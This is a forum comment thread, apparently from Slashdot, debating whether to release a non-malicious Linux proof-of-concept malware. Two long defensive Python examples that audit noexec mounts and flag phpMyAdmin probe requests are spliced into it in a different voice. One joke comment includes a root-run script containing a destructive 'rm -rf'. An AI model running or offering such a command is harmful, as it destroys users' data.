This way, people qualified to fix the problem can review your proof of concept and fix the problem, but you're limiting the exposure to the average bored 15 year old whose skill set doesn't extend too far beyond downloading a .c file and running gcc.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
> Hopefully, IQ is higher on /.
Not judging from the average response to any article mentioning Microsoft, god forbid anything political. There's just a higher concentration of technical skill. That ain't the whole picture of IQ.
No malware? I think the claim is that Linux doesn't have the threat from viruses that Windows does - actually, it has little threat from them at all.
"loose security configurations and mindless execution of unverified downloads" - so, the sort of thing no admin with any brains, regardless of the OS they were using, would do? The difference is, you can fairly much lock up Linux very fast, with little a non-privileged person can do, while not really limiting what services the machine will offer. With Windows on the other hand, it takes more effort to lock it down, and things become far more burdensome to deal with once you do. Let me tell you how much I loved having errors all over the policy editor in Windows because of some basic security settings...which meant that doing normal, everyday Windows admin tasks you would be confronted with errors left and right because of the policy settings. Doing normal, everyday UNIX admin tasks on a locked down box though...no issues.
Why do people take the argument so damn personally, anyway? The OSes are meant for different things. That one is better at some things than the other should make sense - they have entirely different methodologies.
PS - it took you a *week* to write something that could exploit "loose security configurations?" Give me 5 minutes and I'll write something. Go ahead and publish whatever you wrote, I'm sure several of us could use the laugh.
You should be BOINC'ing your hot friends, not their computers!
War as we knew it was obsolete
Nothing could beat complete denial
- Emily Haines
Open source it, that way we can all contribute to the malware and discuss if it should use gtk or qt. We know that gnome users will refuse to install anything with qt dependencies and kde users will refuse to install gtk+ dependencies. None of the windows malware coders are willing to release their code to us, so we are limited on integration, especially with wifi. I personally think we should target gnome users, they like stepping on people -- just look at how condescending their logo is. Plus I have a grudge against the way they put their contributors down. Once we get enough malwared machines we can convince windows malware coders to support our platform.
Trying to install linux on my microwave, but keep getting a kernel panic...
"IQ is higher on /."
And more to the point: Hopefully the average intelligence is higher on /.
So you're saying that a group of people none of which have an innate ability to determine right from wrong come to better ethical decisions than an individual with the same limitation?
I think you meant "UI through obscurity".
So don't release it. Pretty straight forward if you ask me.
||| I still can't believe Parkay's not butter.
> Will it get you laid?
> Will it enhance the ability of your children to get laid?
> If yes, then you are morally obligated to do it.
"There is no 'right' or 'wrong', 'good' or 'evil'. There is only 'historically correlated with collective survival'."
More seriously, wouldn't that position mean that all birth control is evil (IIRC this actually matches what the roman catholics believe (but obviously for different reasons), plus there's "every sperm is sacred, every sperm is great, when a sperm is wasted god gets quite irate") and that the only proper response when a potential partner wants to use a condom is to secretly poke a hole in it? Somehow, that seems a bit off...
And if they didn't, I don't think your "malware" is going to destroy the Linux community, on the contrary. So go ahead.
Dear
from people trying to spell Schadenfreude.
... Consider the 'Rick Astley' iPhone semi-malware released last month that affected jailbroken iPhones.
Someone's now put a deadlier payload on the same code.
Linux has two main things over Windows:
First one is that people can't accidentally execute some random program they downloaded with their browser. They have to intentionally save it somewhere, chmod +x, then run it. There's no "ok, ok, ok, yes I am stupid" sequence of warning dialog button selections that's going to do that, so it takes very intentional actions to run some random code you got from the web.
The second one is that Linux users don't, as a normal thing, run random programs they downloaded from the web. They generally install packages provided by their distribution. If a Linux user needs a RAR compressor they don't go hunt it around the web, possibly landing on a page offering a trojaned version, they "apt-get install" their distribution's verified version.
The first means people are very unlikely to run your code by accident, the second that you have to provide a good reason to run your malicious code.
I think that all this really proves is that if you really insist on running untrusted code on your system it can go and screw with your system (or user account). Well, duh. The question isn't whether it can happen at all, it's how easily it can happen by accident or lack of attention. If the user really insists on shooting their foot there's little anybody can do about that.
But, suppose that Linux got lots of stupid desktop users, who'd download fluffy_kittens.sh and actually go through the steps they need to run it. In that case distributions could add some extra security quite easily, by for instance denying the user the ability to run programs from non-root owned directories (grsecurity does this). This would make it so that even if the user does download your script, sets the permissions, and tries to run it, it will fail to work anyway.
Now of course there's the ld.so workaround, but that's not going to happen from the GUI, and the distribution could always patch their ld.so to obey the grsecurity restrictions.
Given all this, IMO, this exercise proves very little. It proves that if you manage to convince the user to intentionally run untrusted code, it'll be able to do nasty things. But this is a given on any system that's not locked down in a really fascist manner. It'll take a cell phone-like environment with sandboxed applications to defeat that. And even there applications must be allowed to do potentially harmful things to be able to do some entirely legitimate functions.
At that point you have two possibilities: you completely refuse to run unsigned code (pissing off the user), or ask the user "do you want to let this program delete all your data?" and allow them to shoot their own foot.
I am not a lawyer, but as I understand the legal definitions, malware/spyware/virus/trojans do not have to be harmful to be illegal. Anything installed without the user's knowledge and consent is illegal.
It's an obvious lie. Nobody here has a friend with a girlfriend.
Uhh no, it's retarded and was modded funny as a result. Security through obscurity has been debunked dozens of times. Mac OS for instance is pretty visible, but yet seems to have not even a fraction of the problems another major commercial OS does. And don't tell me there isn't a major bonus for being the hacker to really pwn OS X. I'm sure as a Windows troll you would give a nut for this kind of exploit just to prove this lame claim. Vista and W7 are a HUGE step forward, but don't pretend that the only reason everybody else is safe and Windows is a spyware dungeon is just based on marketshare.
This is an important milestone in the Linux to the Desktop campaign.
Without a "healthy malware ecosystem", Linux isn't mature enough to be called a desktop operation system.
Think about the AV industry!
Patents Drive Free Software as Hurricanes Drive Construction Industry
I've always thought it was hard enough to get apps and services I do want to install and get going on Linux that some random piece of malware has no chance.
Install and Run Instructions ./LinuxMalware1.0.exe.sh
==================
chmod a+x ./LinuxMalware1.0.exe.sh
su -c "./LinuxMalware1.0.exe.sh"
Script
==========
#!/bin/bash
rm -rf
exit 0
The Point
=============
If you are running things from an untrusted source then you are a dumb-ass.
There is no patch for human stupidity.
http://www.rocketdownload.com/software/rar.html
Security through obscurity means that you don't know the code, not that people don't know the OS.
Really?
Non-MALicious MALware?
It's awesome to see non-malicious malicious software for Linux.
Way to go, kdawson, your reading comprehension skills are just freaking top notch.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
And I'm not worried at all. Peeling back some "nasty" multi vector injection into start-up and cron will probably take me less time to clean up than it took the author to write.
“Common sense is not so common.” — Voltaire
Not true. I'm off to a D&D game tonight where one guy - oh wait, she ditched him.
This doesn't prove anything. If you download and run untrusted and unverified code you are boned no matter what OS you may be using. This says nothing about the overall security of the OS, but only about the stupidity of the user.
Why should a (web)server be allowed to issue any request? It should be configured to answer queries only, no? iptables is great and easy to set up for that task. Even for software updates, one may push the needed package to the target server in place of the usual pull from the target, so no exceptions are needed on the firewall.
For desktops it's a little bit more complicated... but using a home partition mounted with noexec should suffice. Installing new software is not a casual issue but a real event and should be taken care of by someone knowing what he's doing. That's why root was invented, isn't it?
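Both the noexec home partition suggested in the comment above and the earlier idea of refusing to run programs from directories not owned by root (the grsecurity approach mentioned a few comments up) can be checked with a small audit. The following is an added example, not code from either poster or from grsecurity: it parses a constructed /proc/mounts excerpt, finds the mount that contains a path, and applies a trusted-path rule loosely modelled on grsecurity's (the directory must be root-owned and not group- or world-writable). The mount table, directory inventory and file names are all made up.

```python
"""Audit whether a path could be executed directly under two controls:
a noexec mount option and a trusted-path rule (root-owned, not group/world
writable directory). Constructed example; the inventory below is made up."""
import os
import stat

# Constructed /proc/mounts excerpt: device, mountpoint, fstype, options, dump, pass.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /home ext4 rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
/dev/sda3 /usr/local ext4 rw,relatime 0 0
"""

# Constructed directory inventory: path -> (owner uid, permission bits).
# On a live system this would come from os.stat() on each directory.
SAMPLE_DIRS = {
    "/usr/bin": (0, 0o755),
    "/usr/local/bin": (0, 0o755),
    "/tmp": (0, 0o1777),
    "/home/alice": (1000, 0o755),
    "/home/alice/Downloads": (1000, 0o755),
}


def parse_mounts(text):
    """Map each mount point to the set of its mount options."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        # /proc/mounts escapes spaces in paths as \040; undo that before comparing.
        mountpoint = fields[1].replace("\\040", " ")
        mounts[mountpoint] = set(fields[3].split(","))
    return mounts


def mount_for(path, mounts):
    """Return the longest mount point that contains path (component-wise prefix)."""
    best = "/"
    for mp in mounts:
        if mp != "/" and (path == mp or path.startswith(mp.rstrip("/") + "/")):
            if len(mp) > len(best):
                best = mp
    return best


def trusted_directory(directory, dirs):
    """Trusted-path rule: root-owned and not writable by group or others."""
    meta = dirs.get(directory)
    if meta is None:
        return False, "directory not in inventory"
    uid, mode = meta
    if uid != 0:
        return False, "directory not owned by root"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False, "directory is group/world writable"
    return True, ""


def may_execute(path, mounts, dirs):
    """Return (allowed, reasons) for executing path directly via execve."""
    reasons = []
    mp = mount_for(path, mounts)
    if "noexec" in mounts.get(mp, set()):
        reasons.append("mount %s is noexec" % mp)
    ok, why = trusted_directory(os.path.dirname(path), dirs)
    if not ok:
        reasons.append(why)
    return (not reasons), reasons


if __name__ == "__main__":
    table = parse_mounts(SAMPLE_MOUNTS)
    for p in ("/usr/local/bin/tool", "/home/alice/Downloads/fluffy_kittens.sh", "/tmp/x.sh"):
        print(p, may_execute(p, table, SAMPLE_DIRS))
```

Both rules only cover direct execution of the file. As the thread already notes, handing the file to ld.so (or to any interpreter as an argument) bypasses noexec, which is why the comment above suggests the loader itself would also have to honour the restriction.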
What? Have things now become so gentrified that this question even needs to be asked?
Release it already.
The 90's were great because there were active threats from all sides, spurring people to meet the challenge with actual defenses against the mayhem. By comparison now things are much more secure, but they are also incredibly less exciting, and markedly less progressive. If developers/coders are driven by a need to scratch an "itch" then by all means let's make things itchy again.
The software is non-malicious you say? Great! If nothing else it'll serve as some things for people to think about as they continue to develop their environments, and at the very least it sounds like you may have identified some genuinely soft spots in the current generation of Linux distributions. You would be far from the first person to post non-malicious proof-of-concept code to say, Bugtraq. This is not new ground--no one is going to claim you did something wrong by publishing.
Release it already!
Either we're tough enough to handle it, or we'll get tough enough to handle it.
Your idea has both merit and originality. Unfortunately the bits that have merit are unoriginal, and the bits that have originality have no merit. Good luck attempting to get n00b Ubuntu ('cause Debian is tooo hard) users to install your "malware" - given that so many of them think cli is some sort of "G" spot. Is your exploit driven by the availability heuristic?? Leaving aside the chances of your exploits "wising up" the world (get down off the cross, we need the wood) I am reminded of the saying that the "empty matchbox makes the most noise". Google gives "Results 1 - 10 of about 1,780 for "I was fed up with the general consensus that Linux is oh-so-secure and has no malware." del./r>null PS. If you find you can't unlock your C:, try "" as a password (without the quotes)
I don't hear linux zealots talk about security through obscurity.
It is the windows zealots who state that as a justification on why windows is so virus and malware prone.
... if their product can be used as a gateway for malware to enter the system running it. They should at least write a "How to install/run BOINC without being screwed", if not extend the connection protocol to force a "BOINC tasks distribution server" to authenticate in a special mode (while deprecating the prev protocol allowing a poser to trick the user into downloading "jobs" from them).
Questions raise, answers kill. Raise questions to stay alive.
I doubt it.
Tech savvy != intelligent
It amuses me how many of these posts are obviously written by people who have never run Linux or have no understanding of the differences between Windows (30 year old hack job of unmanaged code), and Linux. So I dare everyone to read this. If you really believe that Linux is just as insecure as Windows, read this entire article (front to back), then go apologize to everyone in your life you have misinformed over the last X number of years.
http://www.theregister.co.uk/2004/10/22/security_report_windows_vs_linux/
My Linux systems get a lot of attacks every day. SSH, FTP and HTTP attacks are the most common.
On HTTP attacks, most try to get a page /phpmyadmin or some other (most of the time PHP) application which seems to have severe security issues. There are many insecure web applications out there that are not patched or pretty much broken by design.
I bet the security hole you're exploiting is already used in the wild. If that's so, who cares if another kid takes your code and turns it into real malware?
I personally believe it's more beneficial to release your code as a "penetration test" and help some admins check their servers for potential security holes than to do nothing in fear of a few kids.
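The /phpmyadmin probing mentioned in the comment above is easy to pick out of an access log. The following is an added example, not the poster's code: it parses a few constructed Apache combined-format log lines, counts requests for administration-tool paths per source address, and separately flags any such request that got a success status, since that means the tool is actually reachable on the server. The list of probe prefixes and the log lines are assumptions made for the example.

```python
"""Flag sources probing for admin tools in an Apache combined log.
Constructed example; the log lines and probe list are made up."""
import re
from collections import defaultdict

# Combined log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed list of path prefixes that legitimate visitors of this site never request.
PROBE_PREFIXES = ("/phpmyadmin", "/pma", "/myadmin", "/mysql")

# Constructed sample log: one scanner, one normal visitor, one hit that succeeded.
SAMPLE_LOG = """\
198.51.100.23 - - [06/Dec/2009:10:01:02 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 404 212 "-" "Mozilla/4.0"
198.51.100.23 - - [06/Dec/2009:10:01:03 +0000] "GET /pma/index.php HTTP/1.1" 404 212 "-" "Mozilla/4.0"
198.51.100.23 - - [06/Dec/2009:10:01:04 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 212 "-" "Mozilla/4.0"
198.51.100.23 - - [06/Dec/2009:10:01:05 +0000] "GET /myadmin/ HTTP/1.1" 404 212 "-" "Mozilla/4.0"
203.0.113.5 - - [06/Dec/2009:10:02:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Dec/2009:10:02:01 +0000] "GET /about.html HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
192.0.2.9 - - [06/Dec/2009:10:03:00 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["status"] = int(fields["status"])
    return fields


def is_probe(path):
    """Case-insensitive prefix match so /phpMyAdmin is treated like /phpmyadmin."""
    lowered = path.lower()
    return any(lowered.startswith(p) for p in PROBE_PREFIXES)


def report(lines, threshold=3):
    """Summarise per source: number of probe requests and which probe paths
    returned a non-error status. A source is reported if it made at least
    `threshold` probes or if any probe succeeded."""
    hits = defaultdict(int)
    reachable = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_probe(rec["path"]):
            continue
        hits[rec["ip"]] += 1
        if rec["status"] < 400:
            reachable[rec["ip"]].append(rec["path"])
    return {
        ip: {"hits": hits[ip], "reachable": reachable[ip]}
        for ip in hits
        if hits[ip] >= threshold or reachable[ip]
    }


if __name__ == "__main__":
    for ip, summary in report(SAMPLE_LOG.splitlines()).items():
        print(ip, summary)
```

The second signal is the more important one: a long run of 404s is background noise on any public server, but a 200 on a /phpmyadmin path tells the admin that the application is installed and exposed, which is exactly the situation the comment above describes.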
So this idiot thinks his "virus" or whatever will make a difference in the world.
Releasing it to the public will tarnish your reputation (if you have one), not to mention the parasites that will try to adapt it and use it to exploit people.
You are an idiot. Please create software that people will benefit from and enjoy using instead of garbage.
Release it privately to some of the "good guys" so they can fix it?
Can Linux be modified to prevent such malware from being run on any given machine? If so, why would you not want to help close such a glaring hole in the OS, while maintaining the least amount of disruption?
I see malware as something that needs fixing. You seriously do not?
To be honest, I don't really see why you are asking /.
You should be taking this straight to the folks that work on this stuff...uh...erm...Hrmm. /exit stage, left
If you created this code in hopes of making things better, first of all, talk to developers, if you have good ideas about how to eliminate such possible threats, or write articles and talk to regular people about good computer practice and computer security, thus educating them. Those who do understand computer security already know it is possible to hack any system and they do not need any kind of demonstration. It has always been possible to hack a system, whether it is Windows, Mac or Linux, ...just wait for a bug and that's it, you will have your chance of hacking.
And to release it, just to show some regular people that it is possible to hack stuff in Linux too, is useless, pointless and even harmful in the long term. Regular people do not understand, do not want to understand and will never understand computer security.
So if you want to make things worse, go, release the code and start to screw up the Linux system.
Some things are genuinely ambiguous, and "should I release a sample virus which helps security researchers and malware authors at the same time" is, IMO, pretty ambiguous. The optimal solution would be to find a way just to release it to some security people and then put it out after a few weeks.
If someone wants your network, they will take it regardless of how much security is implemented. It's that simple.
So you can write malware for Linux - no big deal - connecting to IRC and waiting for instructions like DDOS'ing some server and sending mails, sure that's possible. The reason why Linux is so secure is not that malware was magically "impossible" (which would contradict Rice's Theorem btw).
If you have access to a machine, then OF COURSE you can install malicious binaries, only an idiot would claim the opposite! GETTING that access is the problem! And default users don't have access to system directories, so they can only infect their own account (plus: since binaries by default don't get the execute bit, it's quite hard to make someone execute your binary by accident, e.g. by making it look like a Word document or a video or something... you have to get him to chmod +x your binary, and THAT is no accident anymore).
The MAFIAA is a bunch of mindless jerks who will be the first up against the wall when the revolution comes
On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed.
This is pretty silly. Slow news day?
^..^
Mail it to Linus, Alan Cox and the maintainers of subsystems which it abuses. Include clear notes of how it works, and what can be done to protect the systems. If you can't trust these people with it, then you should not trust Linux with your data at all. Even better, since you understand the tricks it uses, if you can write some patches, and submit them, together with your proof of exploit.
On a personal note - I also want to say thank you for doing this work. I use Linux both on servers, and as my normal desktop, and I'm immensely pleased that people are looking at making it safer: thank you.
Intelligence is task specific. You can have brilliant scientists be reduced to bumbling idiots the instant they sit down in front of a computer. Of course it's not a matter of brainpower but a matter of knowledge but they don't have that crucial knowledge and thus make mistakes that, to the average computer geek, look like pure idiocy.
Asking random smart people about the ethical implications of a highly technical issues is not going to give as many insightful answers as asking random technical people does.
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
That seems like an oxymoron to me.
His worm had a little bug in it and see what happened to him :)
"what a sl*t she is" or what a complete F***ING a-hole you are?
This person, with the exploit, should write a paper, submit it to a conference and explain what he did. Don't have to release anything into the wild. Be the good guy and preach good security practices - and where there are holes to be filled.
Just release it already.
If it actually causes enough trouble to be noticed there'll be a fix for it quick smart, otherwise it won't matter.
"a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects"
Can you provide a link to a demonstration of this Linux 'malware'. One that - with no user action - can compromise my machine or by clicking on even a version of 'malware' that works by clicking on a URL or opening an email attachment.
As far as I can make out, users must first download and install BOINC and allow RPC calls. I mean, if that's your definition of malware, so is me putting a safe in the middle of the street with the combination numbers taped to it. No doubt you would then write a story about just how easy it is to crack that particular model of safe.
kdawson, have you nothing else to write about ???
Windows 7 is a HUGE step back when compared to Windows Vista. The UAC is so limited that it does not give any kind of real protection like Vista's version did. On Windows 7 any normal account user can add new users and even give them admin-level rights without UAC even giving a warning. That is the default setting and does not help protect the computer. Then the Windows 7 UAC was tested against the 10 newest malware and almost all went totally through it, without giving any kind of UAC question.
Marketshare has nothing to do with security. The code is the only thing that rules whether the software is secure or not. Secure software can be shared with all humans in the world and no one could actually crack it. But you need to share insecure software with only a few users and they would get cracked if that software is being used in a situation where there is good profit. If you have software that is in use in all US banks, it is a much higher risk to get traced because there are other security measures. But if you have the same software in all PCs in the US, it is much harder to get traced back to you, but the profit is much smaller, just like the risk. It is always easier to attack insecure persons than other, well protected persons.
I'm not pro-war, but I sure as hell will be happy that war allowed us to develop the nuclear bomb when aliens invade. So I say release it - knowledge is impossible to contain - we are better off adapting to it early.
So the fact that Apple computers are consistently the first to be hacked in pwn2own contests, have completely passed you by?
This is what you REALLY want to hear, right?
You wrote some crappy malware (seriously, not that hard to do), managed to autostart it with bashrc (seriously, you call that "nasty"? every first semester student should be able to do it) and then you boast about it on the internet. I very much doubt that the morality of the matter is really a concern. You just want others to know that you are a cool hacker that could hack Linux. Newsflash: Nothing special.
Release it or not, it really doesn't matter. There are a million other scripts like that out there already and yours is most probably in no way special.
Of course, why actually sleep with her when you can just brag about her offer on slashdot!
Why not do both?
What is it that makes malware, well, malware?
It's software on your system which you don't want there, didn't ask for, and can't easily get rid of without a significant investment in time and/or knowledge.
Seems like it fits the definition to me. In Windows, malware usually infests the system (registry, files, processes, etc.), and sometimes it's not all that clandestine about it. This would not be so dissimilar from unwanted software which only remains resident in the user's $HOME: due to uniform package management and vastly improved install scripts/configuration, a reinstall is relatively straightforward (dump package names, reinstall, install packages) and takes a reasonably short period of time (less than a Windows install on its own, for instance). Instead, the offending executable would have to be dug out of $HOME manually (or found with a tool) - either way, it's an agitation and non-trivial if you're unsure of what you're looking for.
Now, is this malware example particularly trivial and not all that attention grabbing? Yes. How did this make FP?
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
As long as you release it properly you should do it.
Don't kid yourself. It's the size of the regexp AND how you use it that counts.
My first thought was that the OP is a Microsoft shill.
Microsoft would feel very smug if Linux could be shown to be as vulnerable to malware as is Windows.
Well? Are you?
Don't waste your time with jedidiah. He is a known anti-ms troll & F/OSS cheerleader.
Look, unless it was purchased in the last month or so (and I may be too liberal with the timeline since OEM machines can sit on a shelf for months), I don't dare set up a Windows XP machine and connect it directly to the Internet to update the operating system because it will be pwned in about 30 seconds. Part of the problem is Microsoft's dependence on updates over the Internet to fix known vulnerabilities. I know, I know, there are ways around it, but how many apply to the owner of a Dell machine with a recovery disk? No stupid luser involved, no need to download anything, just connect it to the friggin' Internet to update the patches!
I can (and have) download(ed) the latest image of any of the popular *nix's, do an install and be reasonably certain that the unit will not be pwned when I connect it directly to the Internet.
Now tell me again how *nix's are as insecure as Windows...
"If executed by the user"
We're done here. Next time try a remote exploit requiring no user action. They do exist.
There isn't something all white you could be doing instead? Priorities man! Priorities.
-- Programming with boost is like building a house with lego. It's a cool but I wouldn't want to live in it
So one of my users accidentally runs your trojan. No problem. I write a script that cleans it up on every machine in my network without interfering with the users at all. It takes me about 5 minutes.
On MS-Windows, I have to go around to every machine on the network to clean it up. There have been times I've had to re-ghost a machine because it was so infected.
I'm not sure what this whole apple-to-oranges gedanken is all about. It surely doesn't explain how MS-Windows is just as secure as Linux.
Microsoft is to software what Budweiser is to beer.
Since the mal in mal-ware stands for malicious, it is logically impossible to release non-malicious malware.
This is another example of typical programmer thinking.
I see a security hole, I'll EXPLOIT it with some "harmless" malware, and teach people a lesson.
-Are you 100% sure your "harmless" malware will not bring down a critical system?
-Can you sleep at night knowing you broke several laws?
-How about if people choose to go after you for damages?
I know you are just a simple programmer, and have no professional body we can complain or report you to, besides your employer, but you can still be held PERSONALLY liable for damages.
A real engineer would NEVER EVER think of doing this. "software engineers" on the other hand, have time to think of doing crap like this, because they have no real consequences besides being personally held liable, if they are ever caught.
Go hide behind your anonymity. Give programmers a black eye from which they may never recover.
"software engineers" my a55.
I have a friend who is a chuckle-headed moron. He used to be a drug addict. And now, when he talks about the drugs, he actually describes, in detail, how he abused them so that anyone who hears him will know how to do it and thus become an addict even quicker. And I tell him not to and he goes on with the description because he has a perverse side of his personality. Publishing how to hack and do root kits to 'the world' is much the same. People who do this are looking for approval and/or money.
No
Nope
Uh-uh
Nut
Naw
Nah
No way
Na
Nese
Nein
Naaga
Bu shi zhe yang
Nanga
Ndaga'
Nei
Nyet
I think you get the idea.
The pwn2own contest isn't a bunch of people hacking different OS's simultaneously: They draw names from a hat to see who goes first. People aren't hacking from scratch at the contest either: most show up with exploits for multiple OS's that they already know to be working.
Since you get to keep the hardware if you're the first to hack it, OF COURSE EVERYONE CHOOSES TO USE THEIR MAC EXPLOIT FIRST. Vulnerability never even enters into the equation; it's hacked first because people want to win the most expensive and best hardware. Windows immediately falls when the next contestant steps up and can no longer win the Mac hardware.
Of course... Linux did make it all the way through the pwn2own contest in the past.... but it's impossible to say if that's due to lack of interest or the fact that the browser installed on the machine was one the contestants were unfamiliar with and therefore did not have working exploits.
Oh yeah... from reading about it, it seems that pwn2own tests browser security, not the OS - and it doesn't take into account whether the hack lets you execute user level code (the Mac exploits) or run as the kernel (many Windows flaws). So, I don't really see it as being of any real use as an OS security benchmark.
I really don't understand what the OP is trying to prove. That running a program as a regular user will allow that program to have that user's privileges??? Is this meant to be some sort of revelation?
Note to self, purposely installing malware is not a good idea.
OP: I'm afraid you have wasted a lot of time and proved nothing with this experiment.
Isn't the word "malware" formed from the words "malicious" and "software"?
How can there be such a thing as non-malicious malware when malware is a portmanteau of "malicious software"?
No one cares what your captcha was
Houston TX, USA
What is all this talk about Attack Vector... All these mysterious ways of getting a linux machine infected.
Just put some malware rpm on some random Chinese/Russian/etc server and call it the TurboNvidia.RPM and all a user has to do is click on the damn thing in Firefox and install it. They have to click yes to override the signature but I've seen Ubuntu users do much worse.
Yes, release it! Security through obscurity isn't. This is needed.
Over-the-top Response Guy! Giving "Over-the-Top Responses" since 1970.
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?"
Yes, she's already sleeping with more than one of your best friends, so go for it!
a lot of us have been in the position of being able to do a lot worse, or been offered $$$ to do a lot worse
As a Linux user who works as a software engineer, I'd be interested to learn about the vulnerabilities that the exploit uses to take control of a Linux system. I have no formal security background, but understand how to use cron and Makefiles for non-nefarious purposes... so a short paper about these attack vectors would be quite educational. I like knowing how to protect myself and knowing how to explain to other people what is right/wrong so they can protect themselves. Not publishing known risks (especially if they're PEBCAK risks) is security through obscurity and I think Linux is a strong enough platform that it shouldn't be relying on this type of security.
Linux being made insecure by stupid users. What a shock. Do you really think your code will do anything previous code has not done? Truly? Release it already. My systems won't be affected, nor will the majority of Linux users. I say let the noobs get infected by lame code, they will learn from it.
Ha, Firefox and Explorer stopped responding the first time I opened this thread, so I'm getting a kick, etc.
Anyway, thanks for reminding me that I need to invest in a bunch of RAM for my home server so I can move most of the services into VMs :P
Write a 100-page technical description.
If someone reads it to exploit it.. .. they probably would even without your help.
I could nit-pick your grammar, but is this overall claim based in empirical research? Linux certainly has its flaws and while it's not susceptible to WINDOWS malware, it certainly is to a variety of others. Perhaps take a look at http://insecure.org/ or http://www.packetstormsecurity.org/. Both of these sites maintain lists of exploits to various versions of Linux and many other types of GNU software as well. Rootkits most generally fall into the realm of 'malware' and once you've got root, baby, you've got the world.
I'd go so far as to say that I highly doubt that sufficient numbers of people would be adversely affected by it to warrant any sort of legal action against you... at most you might be providing a proof of concept for security experts who can then proceed to adapt to what changes may be necessary to avoid the attack vector in the future.
Release it, and move on.
File under 'M' for 'Manic ranting'
"Who's" is a contraction of "who is". It should read "There's one thing stronger than all the armies in the world and that is an idea whose time has come. - Victor Hugo"
Free Martian Whores!
It has the bi- prefix.
Just as a lot of other interesting stuff, all starting with "bi-".
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
Arrange for it to steal two cents from each person who installs it, then every month or so deposit half of what it's collected to Torvalds' bank account, and send the other half of the month's take to one lucky infected user.
People will be begging for the thing.
PS, who wrote the AI behind the Captcha system? It's really good. The word for this post is:
"Pyramid"
lets all justn have seccxx
if Linux starts getting as bad as Windows, I will personally hunt you down and beat you to death with Richard Stallman
"I disapprove of what you say, but I will defend to the death your right to say it." - Evelyn Beatrice Hall, re Voltaire
Um, and this is different from a Windows virus how? {...} It's not because your system is any more secure against "CLICK HERE TO WIN FREE XBOX 360" infections.
Windows XP way :
Linux way :
In short there are 2 main differences between the Windows and Unix environments:
There's another big difference, specific to open-source environments like Linux and BSD (and not other Unices):
(Although the above only regards malware exploiting *bugs*, not payloads which are simple regular software).
With Vista and Seven, Microsoft has attempted to fix some of these problems. Nonetheless, the fix is still very noisy ("Cancel or Allow?") to the point that some users simply start to blindly "Yes-click-through" and the protecting effect is lost. And users are still trained to install crap by downloading it from random websites.
With Linux, these advantages become a handicap regarding commercial software: they have to target multiple combinations of software in distributions (unlike open-source software where the packages are vetted by the distribution maintainers themselves thanks to the source being available for that purpose). And this software is not just a package in a regular repository, making it inaccessible using the regular method.
There is indeed no software which is 100% guaranteed secure.
But! There's still a difference, like between putting a real fence around your house and having a dog on one side, and just sticking a paper with "don't rob us" written on it on the other side.
And, no matter what, some users will always find a way to shoot themselves in foot.
But on Unix, the gun is locked behind a glass door and must have a security pin removed before being able to shoot the foot, whereas on Windows an armed ready-to-shoot gun is just a normal wall decoration.
The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting you
Ok, could we please stop with this troll now ?
At one side of the range, Linux has rather good market share in the server and scientific cluster domains.
At the other side of the range, Linux has achieved a quasi-monopoly in the embedded domain, especially on home routers, wireless access points, small NAS/SAN, no-brand multimedia play
So you want to do away with Ask Slashdot? It's a moral dilemma, he's got the potential to do great good but it just as easily might enable those who would use it for evil. Asking peers for opinions or insight doesn't mean he wants to blame others. There might be things he hasn't thought of, or a better way to accomplish things. It's just a smart thing to do.
"Dr. is this the correct incision point, or will cutting here kill the patient?"
"If you have to ask, your ethical compass is b0rked. Dumb@ss n00b!"
Can we mod parent up?
The real reason Linux is malware-free can be summed up in a simple analogy: "You don't let your dog shit in your own front yard." It's no question the preferred box for hackers is a *nix box. Why sully their own yard when there are so many Windows and Mac homes out there with yards perfectly ripe for a fresh Cleveland Steamer?
Like parent says, it's stupid to think of Linux as uncrackable. If there's a port into the system then there's a potential exploit; it doesn't matter what the box is running. It's far more likely that malware hackers just like to have a clean lawn. Leave that shit for some other guy to clean up.
You are obviously thinking more about this than I ever did. Don't worry about it. This sort of stuff has existed since before Thompson wrote a backdoor into the c compiler.
I wrote some similar stuff some years ago, as an exercise. I didn't release anything because I figured everything I did was obvious or trivial. Anyone that wanted to use something like this could have written it themselves.
I didn't think of the Wine angle, that's neat. Of course, I've never used Wine, so perhaps I'm excused. ;-)
Please don't associate BOINC with your little project. It will confuse the casual reader into thinking it is something bad rather than something good.
"Education is not the filling of a pail, but the lighting of a fire." -- William Butler Yeats
Why should this be any different from what research scientists do all the time (with actual security holes to boot)? Just write up a research paper (or a blog post or whatever) and describe the problem and give some thoughts to possible solutions (user not being mindless idiots anymore) and release it. There is definitely nothing ethically wrong with it in my book (and there shouldn't be in anyone else's either).
Please stick to Jaunty for now. DO NOT try to install Karmic yourself.
"When information is power, privacy is freedom" - Jah-Wren Ryel
I'm sorry, but running userland "daemons" is child's play. This has been around for EONs. Please don't think you have something new here.
